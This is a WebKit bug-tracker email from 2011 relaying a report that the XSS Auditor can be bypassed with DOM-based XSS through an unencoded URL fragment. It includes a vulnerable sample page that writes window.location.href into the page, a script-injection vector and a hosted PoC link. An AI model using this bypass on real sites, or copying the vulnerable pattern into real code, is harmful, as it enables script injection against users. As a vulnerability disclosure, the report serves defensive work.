[Webkit-unassigned] [Bug 66585] New: XSS Filter Bypass with long strings

Fri Aug 19 14:01:33 PDT 2011

https://bugs.webkit.org/show_bug.cgi?id=66585

           Summary: XSS Filter Bypass with long strings
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: All
        OS/Version: All
            Status: NEW
          Keywords: XSSAuditor
          Severity: Normal
          Priority: P2
         Component: WebKit Misc.
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: abarth at webkit.org
                CC: dbates at webkit.org
        Depends on: 66580

http://code.google.com/p/chromium/issues/detail?id=76796

VULNERABILITY DETAILS
There is a way to bypass anti-XSS filter for DOM XSS exploiting a "window.location.href".

Considering a typical URL:

scheme://domain:port/path?query_string#fragment_id

Browsers encode correctly both "path" and "query_string", but not the "fragment_id". 
Explorer does not encode neither "query_string".
So if used "fragment_id" the vector is also not logged on Web Server.

VERSION
Chrome Version: 10.0.648.134 (Official Build 77917) beta

REPRODUCTION CASE
This is an xss_location.html page:

[[
<script type="text/javascript" language="javascript"> 
    document.write( window.location.href );
</script>
]]

The attack vector is:
xss_location.html?#<script>alert('XSS');</script>

* PoC:
For your convenience, a minimalist PoC is located on:
http://security.onofri.org/xss_location.html?#<script>alert('XSS');</script>

* References
 - DOM Based Cross Site Scripting or XSS of the Third Kind - http://www.webappsec.org/projects/articles/071105.shtml

-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.